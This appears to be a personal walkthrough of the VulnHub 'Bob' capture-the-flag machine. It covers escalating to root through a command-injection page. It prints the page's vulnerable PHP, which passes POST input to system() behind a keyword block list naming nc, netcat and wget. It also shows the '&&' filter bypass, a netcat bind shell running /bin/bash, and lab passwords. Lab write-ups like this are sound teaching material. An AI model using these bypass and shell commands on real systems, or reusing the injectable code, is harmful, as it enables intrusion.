This article is a walkthrough on how I solved Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.
It is a Beginner to intermediate challenge and at the end we have to gain the root access and get the flag.
So let’s do this:
To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/
I used netdiscover to get the ipaddress of Bob Virtual machine. In my case, The ip address is 192.168.0.107.
netdiscover -r 192.168.0.1/24
I scanned the host with nmapand discovered this:
So 80 and 21 are open. I visited their website.
It is under construction. Couldn’t find much of the information with source code too. So, I fired up nikto to get more info:
nikto -h 192.168.0.107
It says robots.txt is present.
The passwords.html page contains this:
Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob
login.php and lat_memo.html also doesn’t contain much information. Then, I turned to dev_shell.php:
Seems like the admin gave us a command injection platform. I used a lot of commands here but I will only give the useful ones in this article.
I tried ls as my first command.
But it isn’t seem to work so I used stacked approach to see if that works and it does work:
cd . &&ls -a gave me the above result. When I looked in the same directory in which I am. I found 2 important files: .hint and dev_shell.bak
I downloaded dev_shell.bak. It has the following code:
<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST[‘in_command’]);
$bad_words = array(“pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc”);
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id=”shell”>
<h2>
dev_shell
</h2>
<form action=”dev_shell.php” method=”post”>
Command: <input type=”text” name=”in_command” /> <br>
<input type=”submit” value=”submit”>
</form>
<br>
<h5>Output:</h5>
<?php
system(“running command…”);
//executes system Command
//checks for sneaky ;
if (strpos($command, ‘;’) !==false){
system(“echo Nice try skid, but you will never get through this bulletproof php code”); //doesn’t work 😛
}
else{
$is_he_a_bad_man = explode(‘ ‘, trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system(“echo Get out skid lol”);
}
else{
system($_POST[‘in_command’]);
}
}
?>
It’s simply an input sanitize script which seems to trim commands given in the array. Now, I know why ls command was not working. 😛
the .hint file which is a hidden file have following text:
No, I haven’t tried spawning a tty shell till yet. So let’s spawn a shell:
netcat cheat sheet came to rescue. With the above php script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used
cd .&&nc -l -p 3333 -e /bin/bash
and then on my kali os, I used this command: nc 192.168.0.107 3333
and I got a shell. This is not a real shell so I spawned a bash shell using:
python -c ‘import tty;tty.spawn(“/bin/bash”)’
once, I got the real shell I checked for hidden files. I check the home directory and found that this vm has 4 users: bob,elliot,jc,seb. I check the elliot directory first and Lands on to this file theadminisdumb.txt which said:
with this I knew that elliot is not an admin but the bob is. It also gives information about the password of James [who is jc] which is Qwerty and Elliot’s password which is theadminisdumb. So I tried logging in
su elliot //password: theadminisdumb doesn’t work
su james //password: Qwerty works
Now, I traversed the directory for Bob and found a hidden file: .old_passwordfile.html which gave me the password for sebastian [user seb] which is T1tanium_Pa$$word_Hack3rs_Fear_M3.
su seb //password works 😉
So, now I need to know the password for Bob, elliot’s password is not required since he is not the admin here. So I searched the bob’s directory for any password file and I landed on to Downloads.
I found backed up ftp for bob and I put it on john and it decrypts to Qwerty. So I tried it on both on ftp and normal OS login but it doesn’t work.
I further searched the Documents directory where I came across these files: login.txt.gpg [I overlooked this file as jpg before 😛 and then I saw it again]
Secret [I overlooked login.txt.gpg for this folder. ;p]
and then staff.txt which doesn’t contain much information.
I went to secret folder and at the end of it found notes.sh and I opened it.
At first I thought it is of no use but then it occurred to me that the starting letters of these echoed lines forms: “HARPOCRATES”.I thought to try it on bob but it didn’t work.
So I went back and started looking again, all frustrated!!
I found the flag.txt which is in cd / directory. But I can’t open it unless I am root.
Remember the file login.txt.gpg ? That’s my last queue!
I google .gpg and found this:
GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).
login.txt.gpg is an encrypted file and I need a passphrase to decrypt it and I only got “HARPOCRATES” which I found in Bob’s directories.
So I tried gpg -d login.txt.gpg on console but it is not giving a prompt for the passphrase entry. Another problem!
So I searched more ways to pass the passphrase in the command-line itself.
Found about the batch mode where in you can pass the decryption key with commandline itself.
gpg –batch –passphrase HARPOCRATES –decrypt login.txt.gpg
the password for bob is b0bcat_
I logged in as bob but I still can’t access the flag.txt file, it gave me this output when I cat /flag.txt
I used less and more editors too but then my access is denied. So I tried logging as root with the same password as bob’s, I got in and here is the flag.
That’s it for now!
Ciao 🙂